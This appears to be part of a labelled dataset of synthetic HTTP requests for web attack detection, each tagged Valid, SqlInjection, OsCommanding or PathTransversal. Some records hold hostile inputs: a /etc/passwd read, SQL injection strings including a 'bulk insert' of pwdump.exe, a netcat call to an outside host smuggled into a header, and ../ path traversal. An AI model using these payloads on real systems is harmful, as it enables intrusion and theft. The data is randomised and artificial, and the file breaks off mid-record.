Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: 79.103.215.26
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-15;q=0.6, utf-8, x-mac-chinesesimp;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: ND-iyB
Cache-Control: min-fresh=202
Client-ip: 78.173.68.149
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="6"
Date: Sun, 16 May 04 02:08:10 GMT
ETag: W/"RQOwSVWoeJGj0tXwiO"
Expect: rXsedfef
From: ovnitL@umeod.net
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Mon, 16 Oct 06 18:24:27 CET
If-Match: *
If-None-Match: "eaDJv2vn9mMXRHLOE"
If-Range: *
Max-Forwards: 260
MIME-Version: 0.9
Pragma: r=vp
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Digest uri=http://www.wuCi.uk/Ab4jhqe/loemhf/deenLse/6tobu.php
Range: -03018,-4474
Referer: /awsulu.php3
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: retoeeha/5.6.1.7
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: cRpj/3.7
Warning: 607 42.242.50.182 "p8wLrga" "Tue, 06 Dec 05 03:24:33 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

orgwAGQs=/etc/passwd&7n2Av=ulhmenmCnk0wli&n8u=sirpshikfi1tnd&AA5WOjhtaccesOnZ=t6rz7yh&Ueib=01156&etugqp=jtrs&s6o=nCl9Iw

End - Id: 46106
Start - Id: 22582
class: Valid
GET /e1obRFqCN2S8FAMobO8/dkTp4wmhBGPQ8sGiqI/mteTe/rdRMTo/eFx5_J7rydq4AeKBy/ogJym6Q6So3r1LEXr.png?Co=2&Se00aH3Bllogbposition=qaaopendelete+gahwl%28&9chrAsdhdriada=07&exec26RnN=wxgfy8v&XZDccmdMUjtM04=tOsfoenrhiadminmtminmnull&dautnyerhs=hc3&itrmMa=7708&te7Sh6yR2s8fso=P%27nelirrwhs%2FR HTTP/1.0
Host: 14.207.45.83
Connection: 0regpa
Accept: */*;q=0.8
Accept-Charset: windows-1251, iso-2022-kr;q=0.4, windows-1253;q=0.1
Accept-Encoding: gzip
Accept-Language: eabohy-h;q=0.4
Cache-Control: no-store
Client-ip: 44.65.129.4
Cookie: lda=lZEQ4IVPQ;B3asR=f6K3oC;NZdIB=O8aesnytl
Cookie2: $Version="291"
Date: Thu, 03 Mar 05 18:40:58 UTC
ETag: "K1Fub7klIvNIjnohILe"
Expect: dsem
From: tTei@hw46m3.be
If-Modified-Since: Tue, 06 Jun 06 11:54:05 CET
If-Unmodified-Since: Tue, 01 Dec 09 18:04:34 UTC
If-Match: *
If-None-Match: "78zrQFT2bbUfTov_mifs"
If-Range: "4DVA_SmCX1Mw24pcp@"
Max-Forwards: 8
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://28yon.org/iij6lh/pkbw3gd/AoND/aehai/s4tirli.gif
Authorization: NTLM RDdEaXRtcndXakZtZWlhZDN0ZUlpcHJwZWVjbGFzYXBlbmV0aWVkbzBnb2xkbGxj
Range: 4696-5,-34840
Referer: http://www.nyotnbgo.de/Yttt4b/rySFim.dll
TE: deflate
Trailer: Accept-Charset
User-Agent: Mozilla/0.7 (X11; U; Linux i586 0.6; in-Ne; rv:9.5.6) Gecko/29733725
UA-CPU: MIPS
UA-Disp: 869,372,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 012x8198
Via: HTTP/0.9 70.163.34.149, tkgoEb/9.4 49.63.168.25, enajis/8.6 www.ikotHkoo.htm:2028
Transfer-Encoding: identity
Upgrade: mhcsbe/5.4, rea/6.1, rvnsK6/9.4, i1O/4.3, dsl/5.2
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 8769415
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22582
Start - Id: 41138
class: SqlInjection
GET /shtd0ar4lso0gse/r1/2VXPhtpassqw/Gc5peK/h5DXDoOxx@BscF/u1/lB1SZqmailekOci/6rfr/apr/s_s2/oozEp8sorhe.html?rn=andJexec+winnt%2Bs1+Rtb&oofaClrt=%26ere2&tGecho0v74A=bulk+insert++sQn++from+++%27pwdump.exe%27++++++++with++%28codepage%3D%27RAW%27+++%29&thsU=d&r0CiOedn0lhx=ynymtl6&ns=q&ewttlmaah=8&dH0bgsoundSy5K=32181&k_ra=as3ya&rD=nPTmz4GkAO&8blhomiehc=let&8Myihh=5ODcEmM HTTP/1.0
Host: www.omtrtm.it
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.4
Accept-Encoding: gzip;q=0.7, deflate, deflate, compress;q=0.4, identity
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 1.110.214.117
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="173"
Date: Mon, 21 Dec 09 17:28:28 UTC
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Sat, 10 Jul 04 14:14:37 GMT
If-Unmodified-Since: Thu, 21 May 09 06:50:01 CET
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "KuNHUMzqJiC.OFi6Wx"
If-Range: "WcHd.gdXvM.OT3V"
Max-Forwards: 9
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: Basic NmVhZnRva2Q6aUljaWph
Range: 9-668228,-687
Referer: http://www.et39uecs.be/tgloIe4/leaaet/zgs2/zbaIiO/onhy.shtml
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: itoeanmphe (2I_SNKj.y5; rQ4T@Ao)
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color16
Via: 2.5 99.73.122.213
Transfer-Encoding: identity
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 200032143188636
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41138
Start - Id: 35370
class: SqlInjection
GET /uUR_j0Z/dpfba0euTaFie87iiuef/iN5Foip9JeQ9W/ew/aSQmzkrKQ_nhb/5nph-KZ/tipetd76H7dI3YaH/uylLzouNL/k7/sWwbOpQO5LG/mhoCidg7tsi/LactEirNadeee.html?naaic4l6e=9UVc9PrI&RHxupdateF2@WVf0=if%27S&ntmnpRn=osta6%3CRAasf&am84psrtf6m=%27UNIONALLSELECTfieldFROMieeraleschseWHERE%27%27+%3D+%27&tretaqh9lnde6en=67458917&onma8Reri=%3E7tRlh+Ar11l HTTP/1.0
Host: 199.37.1.195
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate;q=0.8, gzip;q=0.1, compress
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie: sertfjfEhrLehr=8520884;Wf0m_4anode=1227430;of8idD=456;laC3lsEel=eOQLtcg
Cookie2: $Version="1"
Date: Sat, 16 Jun 07 24:57:06 UTC
ETag: "hOfZpQKb4lvYuJI"
Expect: 06leorna
From: tevu@zin09xt.com
If-Unmodified-Since: Sat, 16 Apr 05 18:20:05 CET
If-Match: *
If-None-Match: "bFdRT8xK21ndwI7ubf"
If-Range: *
Max-Forwards: 2771
MIME-Version: 9.1
Pragma: kcnMe='dn1fyi9h'
Proxy-Authorization: Digest realm
Authorization: N9er ltrrow=80sdtd
Range: 187-
Referer: /lgnfrH/tpqe/hwyoNent/rTsaun/ol9rr.pl
TE: trailers,trailers
Trailer: Pragma
User-Agent: 38pr5osr (tbsCZe3P; euY6LNb-)
UA-Pixels: 1597x768
Via: 5.6 104.233.219.156
Transfer-Encoding: compress
Warning: 762 www.s9npa.html "1dtnonqawlaGpaprtcfe" "Wed, 25 Jul 07 09:35:32 UTC"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35370
Start - Id: 43627
class: OsCommanding
POST /aNc9YMIDXjaZnK/h1qn9/vzYrcpstHxx/c7D3DdbNj_soFS92bkb/hrob1dvagl/hqerohmtfqitG/t1Wccvlx/Epi/alale8hec/-ljcat6X.cfm? HTTP/1.0
Content-Length: 83
Content-Language: 2yofig
Content-Encoding: gzip
Content-Location: http://www.TscLjesu.gov/herre6s2/aiNtqiea/etTo.tar
Content-MD5: dGpkcmVpeXRybHc2bWZ0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Dec 08 03:48:26 CET
Last-Modified: Sun, 10 Jul 05 01:12:25 CET
Host: 164.177.57.8
Connection: 9nnt
Accept: audio/*;q=0.0, video/mpeg, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.7
Accept-Language: |    /usr/bin/nc    -vvv  89.232.74.119  80%00
Cache-Control: no-transform
Client-ip: 224.134.148.160
Cookie: iub2Iai2=spvttu;adtrtg=@o
Cookie2: $Version="2"
Date: Wed, 09 Jun 04 19:02:45 CET
ETag: W/"_wjzjt03Jr-1UO646"
Expect: 100-continue
If-Modified-Since: Fri, 01 Oct 04 12:38:20 UTC
If-Unmodified-Since: Mon, 05 Feb 07 20:32:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Dec 04 10:44:38 CET
Max-Forwards: 6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="hfwlezH"
Range: 887295-
Referer: /ofng.ace
TE: gzip,chunked;q=0.3
Trailer: Expect
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 7.7; n9-2a; rv:0.3.2) Gecko/00208628
UA-CPU: Sparc
UA-Disp: 8061,518,32
Via: 5.9 6.194.152.26, 6.5 www.ssdo1fE.js, 1.0 www.ushytis.jpg:0
Transfer-Encoding: identity
Warning: 252 70.73.147.186 "pEmiltogwecsNt4" "Tue, 06 Jan 04 03:06:17 CET"
X-Forwarded-For: 229.53.116.226
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hadhituvaoB=s&oErnewse=930754&LLti=Iiie\a&emaeeemo=enh1n&yehepem=group byOaaAnqDn

End - Id: 43627
Start - Id: 4796
class: Valid
POST /06/s9a2Qx/i06nrj4doilt1Tei/dC/lDUZhaNq1wDUF.Lt3wP/cJaALv5g2asSkd/hnnpeof5ygvedr9o/thom/ro0cW.pl? HTTP/1.1
Content-Length: 237
Content-Language: easrlqbn,wuce
Content-Encoding: compress
Content-Location: http://www.uaKm.gov/it8eaosd/cshn.pdf
Content-MD5: ZHo3YXNmZGFsZXJZZGRhcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Apr 05 02:52:26 CET
Last-Modified: Tue, 14 Sep 04 15:14:13 GMT
Host: 157.27.43.102
Connection: pqte
Accept: text/html;q=0.6, audio/x-wav, audio/*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.7, compress;q=0.2, gzip;q=0.9, compress;q=0.7, gzip
Accept-Language: yremeu-3a;q=0.7, 8ssNlwc8-1z8e;q=0.6
Cache-Control: min-fresh=22
Client-ip: 42.233.212.25
Cookie: saeelnhheis=16339;ne=aeeM1oeaiono;ds3tnoilcnee=ons1mJoBn2;w4r7gRn=8yOvIrbM;EezttemqerXEee=1161715;kbT7fP=hwrweet7
Cookie2: $Version="4"
Date: Mon, 28 Jan 08 18:04:06 GMT
ETag: "ov8k5Q.letHDD7S"
Expect: 100-continue
From: otAkg@xeDgx.gov
If-Modified-Since: Thu, 03 Jan 08 03:13:32 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:44:56 UTC
If-Match: *
If-None-Match: *
If-Range: "@IB.EXfFUZFEOGeo"
Max-Forwards: 65
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic ck9IS2VFczQ6c0VvdQ==
Authorization: Basic cnJPbGY3OnIzNG5vdTY=
Range: -751
Referer: http://www.jL7tc.uk/eidk.jsp
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 1.9; bG-sn; rv:5.1.7) Gecko/51950052
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 904x222
Via: FTP/9.6 60.68.202.178, 6.7 87.213.231.47:95, bquP/3.2 78.136.254.1
Transfer-Encoding: compress
Upgrade: smg/9.8, n5os/4.7, tMiW/5.6
Warning: 015 166.151.221.196 "yenbnsehnnhif" 
X-Forwarded-For: 148.27.176.124
X-Serial-Number: 095672914255730
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2Qv4=32&s41ri=eebsalMe3v5bec&atehsrsa=725948019&ttbn=mcc&ittfko=ila&RhtaccesI-uuQo=yeEC ~elTcpmochaw nlibt&iHoexmabmdetq=6&wqdivXrWallbn=tihNuihudserD&yAexecU0G=eeaSor-hstdintolc&zo5sow=307544&noohtrhdbl=likeerga&rrtse6suf=05461&tbtf=r

End - Id: 4796
Start - Id: 33105
class: Valid
PUT /hlwzhVQPRcpXxsA/oCMywfB_0mCyk0Nlo2/tJ7hr9rnraileor/n9Emm1N-r.sh? HTTP/1.1
Content-Length: 233
Content-Language: eexegxho,hm2ssh,pjLnh0ih
Content-Encoding: compress
Content-Location: http://www.naCgoee.be/ndqrtt.png
Content-MD5: ZXl1bnJhb2RvT2Voam9lZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Jan 05 09:23:03 CET
Last-Modified: Thu, 07 Aug 08 16:26:15 GMT
Host: 141.210.6.195
Connection: keep-alive
Accept: image/jpeg, audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mh-onper;q=0.2, e-ezeztaer;q=0.5, eI1ye-ruz20ett;q=0.7
Cache-Control: no-transform
Client-ip: 65.114.28.182
Cookie: _INeNzq.-Ga=36;7sAesnrasjet=e3nij;XcsamqbgsoundrmrcpdocumentQy0X=prnc1oaz
Cookie2: $Version="758"
Date: Sat, 23 Aug 08 02:25:11 CET
ETag: W/"aVMpeQy9lz6kGRwdj_tn"
Expect: 100-continue
From: xeaneer@rsdfgo9iE.net
If-Modified-Since: Thu, 27 Dec 07 23:21:33 CET
If-Unmodified-Since: Wed, 09 Apr 08 23:50:42 GMT
If-Match: "skf551gwvuuWyHjZLoo"
If-None-Match: *
If-Range: Sun, 11 Sep 05 06:45:14 UTC
Max-Forwards: 98
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZWxudHRsOmk0ZTFl
Authorization: Basic VGZiYzBpOmhvc2k=
Range: -794940,20-24662
Referer: /o9el.aspx
TE: chunked;q=0.5,trailers,chunked;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 4.2; pv-do; rv:6.7.7) Gecko/28851843
UA-CPU: Sparc
UA-Disp: 8524,604,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2163x0675
Via: ahvfOl/3.3 215.168.252.103, HTTP/8.5 www.sagk.jpeg
Transfer-Encoding: deflate
Upgrade: dto/7.0
Warning: 497 100.139.203.193 "newZoaido8iliih" "Fri, 09 May 08 22:10:14 UTC"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1678510010970720338
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

ae8JwnO=e2=EEvPooc~&tmetaG-topt99wp-t=ieVpbz2-A&sissb6nsLcht6m=si ak(m[C<e'n&esLionaenaoiSa=4122901&h86FkCRP3=seazembu&um=65495&gsntuc=h6YDYjXU&elothck8mj2Axl=i@qHupeel&wee3sls=iframe0be&W5Rposition=28&gojjfoietVh=n|h

End - Id: 33105
Start - Id: 17646
class: Valid
GET /sTf.aspx?lsc=ni&PSBADhavingV=R&msgptidyt=axe&wesNSet=wgetmdpHniY+alsin&irvdt=b2amnboot.ini HTTP/1.1
Host: www.oiyr.uk
Connection: keep-alive
Accept: image/*, image/*, audio/basic;q=0.6
Accept-Charset: x-mac-korean;q=0.6, gb2312, windows-1253, koi8, x-mac-greek
Accept-Encoding: identity, gzip;q=0.1, deflate;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 149.12.215.3
Cookie: 7cro=-Rdr|kescriptexecmu4ert
Cookie2: $Version="1"
Date: Mon, 01 Dec 08 19:32:29 CET
ETag: "s-gNiks6Lw78EgxIbZn"
Expect: 100-continue
From: atodre@iaex.de
If-Modified-Since: Sun, 25 Jan 04 19:05:43 GMT
If-Unmodified-Since: Thu, 14 Jul 05 12:11:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 10
MIME-Version: 8.1
Pragma: iw='tl'
Proxy-Authorization: NTLM YXBsZ2N0Z0RuYjFzbnRvUmd0YXJsbnQ4dHN0cnNodHVXZXQwZWVpZWV1aWQ=
Authorization: Basic c3Rmcjp5Y3N0cnhh
Range: -05590
Referer: /Aaea/cc6u/Gefhnhib/eetvm/mwlrtshy.exe
TE: deflate,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.1 (compatible; Konqueror/6.6; WinNT; 6o57rHc)
UA-CPU: Sparc
UA-Disp: 427,095,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/6.8 www.eky6i.html, 7.2 www.teMaann.htm
Transfer-Encoding: 8brH; c1AodtE6=tpeoor
Upgrade: teb/8.3, eos/8.4
Warning: 768 www.lonce.jpg:6617 "rDn7td" "Mon, 09 Feb 09 19:00:46 GMT"
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17646
Start - Id: 698
class: Valid
GET /OGmPQKGsystemZTHulJ/6cJ-qyJEmGsQVZ-TAgG.php4?Lrtd=etsDSunrt&eqMMnOrmLwlEx=94&seYcac=rwaq&mc5bb=3&0la8nrf=dnc9nemetay&h6mNmtsseckrnue=2145625059&CrnB_VY9ui=h+oroevt%40-oo&GeESBpdLdiv=190&rdivM.yQk=-i%7ElF&yBBDChtacces_AXP=7261763&dgt1o=4&up2es0ipeloh=eEaLTisDw&42SoIaduaqy0a=link3linoq3%3Cagroup+by%3Fa HTTP/1.0
Host: www.sceotje.com:83
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.0, iso-2022-jp;q=0.6
Accept-Encoding: deflate;q=0.4
Accept-Language: e9-kx
Cache-Control: max-stale=0
Client-ip: 60.58.240.147
Cookie: connectLn3hNXP=nJhWmT4sLhcK
Cookie2: $Version="46"
Date: Tue, 19 Oct 04 22:28:42 CET
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Fri, 06 Jun 08 01:34:33 CET
If-Unmodified-Since: Mon, 18 Feb 08 10:59:09 UTC
If-Match: "6qzZ.Iq3IV4cYsm"
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: "_k7m.grSI54ZfVU"
Max-Forwards: 2954
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBibm1zb3I3aDlSb2FpbFlycWVla2lmRTVkZXFhcnVvc3dpMkQ=
Authorization: Digest qop=auth
Range: -61
Referer: /dczsee/EHtw9q/rqerC/texHle/a2lai.rar
TE: trailers
Trailer: From
User-Agent: Mozilla/0.3 (Windows; U; WinNT 8.5; Lm-fT; rv:0.9.5) Gecko/98008257
UA-CPU: x86
UA-Disp: 047,845,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: 0.5 223.175.176.167, 4.0 33.253.175.209, 0.9 66.239.169.254
Transfer-Encoding: deflate
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 194 84.41.126.122 "mdoaa2i1" "Thu, 12 May 05 04:17:10 CET"
X-Forwarded-For: 26.52.16.97
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 698
Start - Id: 31525
class: Valid
GET /khxblzRg3/ohsto8etndminTac8pe/5UT0Mg-/oy6ntLftobifreeoml/sdumFehtiBTlbQTteAu/edc/ajadyaena/lgtciuthMezattoudHa2/l0x4Y-rpK/egcPMQeDsuu/xnu7iPuzz5CszwYQ_gcK/osobmltet.mspx?egtt=likeohttpsaoz8tessw&edydfijhoo=zkm-0&BSpE17Ianph-UPg=EdmkkcOnodemsD&qlnS6aeh3e=cqlP4DyOc&SKoFwGl.l.=7ikcpe%7Ew4+cea&EavedearAszas=78680&tueaH=atsf&enl9cXchtr=ElnytH&tamrns1=ni%2Be&br5=%260&0de4ruhn66rlse=e+autoexec HTTP/1.0
Host: www.sntf.org
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: n4doaeq='0'
Client-ip: 223.96.61.66
Cookie: mtliihngtecs=gayeil
Cookie2: $Version="9"
Date: Sun, 18 May 08 12:40:09 GMT
ETag: "1OPgRCT_WsRtsYTzTr"
Expect: 7nsmn=roto;unao9=oneyihii
From: 028yme@usxuslalti.it
If-Modified-Since: Sun, 01 Oct 06 06:02:38 UTC
If-Unmodified-Since: Sat, 14 Jun 08 17:14:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Jul 07 21:39:49 UTC
Max-Forwards: 73
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -89812,-061835,42050-159934
Referer: http://www.5a0yy.biz/ugslgr/npVsbmi/tha6/2Ymnahn/tbadspey.js
TE: deflate,chunked,deflate;q=0.2
Trailer: If-Match
User-Agent: Mozilla/9.4 (X11; U; SunOS sun4u 4.9; ia-ue; rv:2.1.4) Gecko/31597679
UA-CPU: 68000
UA-Disp: 5662,024,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 362x515
Via: HTTP/9.3 www.ttnca.tiff
Transfer-Encoding: identity
Upgrade: Csis5m/6.9, opoe/5.3, nade/2.1, dtOer/1.5, et7ss/5.5
Warning: 509 www.e0esa.gif "tr7Dlohbeodoe" 
X-Forwarded-For: 81.227.175.207
X-Serial-Number: 5515370509152
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31525
Start - Id: 10320
class: Valid
GET /haoz3_tC9dC9kHWR/1-c7UQe/uBidigitslethMwan/etcq5XY28LQh/FgmX/rnideP/OkrsayostbnAtdxoant/-sVgFexec5.dll?fbbepndbTh7=nropyo&URJtrreplace90a.lN=81906&rOiuzBvZm=e7v6&4ep8de2k=5tjati3uwrh&mhnhhtecc27e=431304&daohanhotodef=wscno8durhic&82rdf=eEee%3Dge&oyTy=0netcatbcn&vnSEtin=4563823&JN2OuhtaccesVZtmpNu=HEpjAtlo%3Ey%262t7+&me3seisf=riweInen7elrevie&pnmnedFhffsho=dLniokla3ri&priaTamoRfsneti=tte&BnA3tid5bizzoE=5 HTTP/1.0
Host: 7.235.175.143
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip;q=0.1, identity;q=0.1, gzip
Accept-Language: Snedh-ath;q=0.6, aoeEbe5r-fg;q=0.7
Cache-Control: no-store
Client-ip: 42.80.49.249
Cookie: tlxk9sfcx0mtrU=2lylsweateieOgaotl;tdocumentn3JtmpGK@V=6ia0oohooI7e;AtrrtqoalhvmBu=9;kimscxrihdv=ecmdib
Cookie2: $Version="56"
Date: Thu, 07 May 09 13:44:50 UTC
ETag: W/"EYezGROZhzumkOacy"
Expect: eelex
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Fri, 15 May 09 17:57:39 CET
If-Match: "KSQdZm3E44h-iXD"
If-None-Match: *
If-Range: "csxZ_KKTuSUFWi-"
Max-Forwards: 8023
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rfff
Authorization: Digest opaque="shteianm"
Range: 632334-29563,0-36
Referer: http://tGujtlur.it/idui/iwjManWr/alLae/2lu8afp.php
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 5regTnnrtrethlN9
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7424x1666
Via: 1.7 www.eHpag1e.gif, 1.5 19.138.147.176:40705
Transfer-Encoding: eIcgmN; mcneo=uuwhnc
Upgrade: pnge/0.2
Warning: 464 www.t6l1.jpeg "rueaeivla7hs" 
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10320
Start - Id: 19145
class: Valid
GET /mNhhusr/rDfceS_iqg/eoRaho5laTStToSVt/ahnxz/qtPR.b-scriptMQstding/nipec2ia8eniksjs0Ie9/AumcashaSJhnneWacim/Fec7eonieP.mdb?rp2tslvf2=0&TmltxcnupimAM=41aio%2BailstTo%5Bhe&qlaydmv=riidn&9d5RF=eny2%2Fiadlo&hoc=962&nfTatixaatturm=220954&qe0=stdin&d0pwp-psnph-eYivbscriptwhereU=LatNpsfaxm&yutsa4onueii=seGR8%40CAF&nont=oittemnr%3Ee8nn HTTP/1.1
Host: 209.249.145.36
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-950;q=0.4, windows-1253, x-mac-turkish, x-mac-roman
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: min-fresh=0
Client-ip: 40.88.186.196
Cookie: cbooepararnka8=em;KvPt=rlvcs;ouyov=iV.rkCrqy;t9JiJ=bdyh) fue;9oesteOlesi=ieh;lnta1ttoe=rJi
Cookie2: $Version="746"
Date: Mon, 26 Jun 06 10:48:11 GMT
ETag: W/"eKP35ifDThMvjLc-p"
Expect: strmdrs=wmanetts;rxms=ckveNs
From: wi5la4tl@ue6nMine5.biz
If-Modified-Since: Wed, 28 Jan 04 24:32:01 UTC
If-Unmodified-Since: Mon, 20 Feb 06 06:15:46 UTC
If-Match: *
If-None-Match: "E@57J6ZbjFf.5xgIk2Z"
If-Range: "MKSQEd0Ac.1gCKr1pS"
Max-Forwards: 58
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: Digest cnonce="Tkeesaeb"
Range: 2893-27
Referer: /ocsoiO/steonru/3a3n.conf
TE: gzip
Trailer: Accept
User-Agent: mjrhteemqebitHtao7jD
UA-CPU: MIPS
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8378x546
Via: FTP/3.0 193.52.213.97:4703
Transfer-Encoding: identity
Upgrade: ioe/1.7, mcilol/7.0
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 680648582
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19145
Start - Id: 36109
class: PathTransversal
GET /hreas/htmksttsabe/eGjiIAxwLrQP7La2/esypraeasn/ahn.shtml?ko=346766&nr=t%3F&J2HoptexechttpnL_T=jFdfhuRxqFh&eh=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftaantageol%2Fstas%2Feschet%2Fanicvesi.asp HTTP/1.1
Host: 184.23.191.49:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.2, compress
Accept-Language: TibhtMjh-th;q=0.1, tWnertFo-eb, HsZteI-R;q=0.0, baoindwi-neuhgamp, honCEtse-etb5eeh9;q=0.6
Cache-Control: no-transform
Client-ip: 100.85.62.104
Cookie: iodr4=aD363rFsXiq;7DPB5=193167453;7a5EohtdH=baatHetilikr<
Cookie2: $Version="95"
Date: Sun, 11 Feb 07 13:02:45 CET
ETag: W/"lwclySd@piARZiDF"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Tue, 19 Jan 10 22:55:23 CET
If-Unmodified-Since: Fri, 22 Oct 04 18:45:40 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jun 05 24:15:09 GMT
Max-Forwards: 5209
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
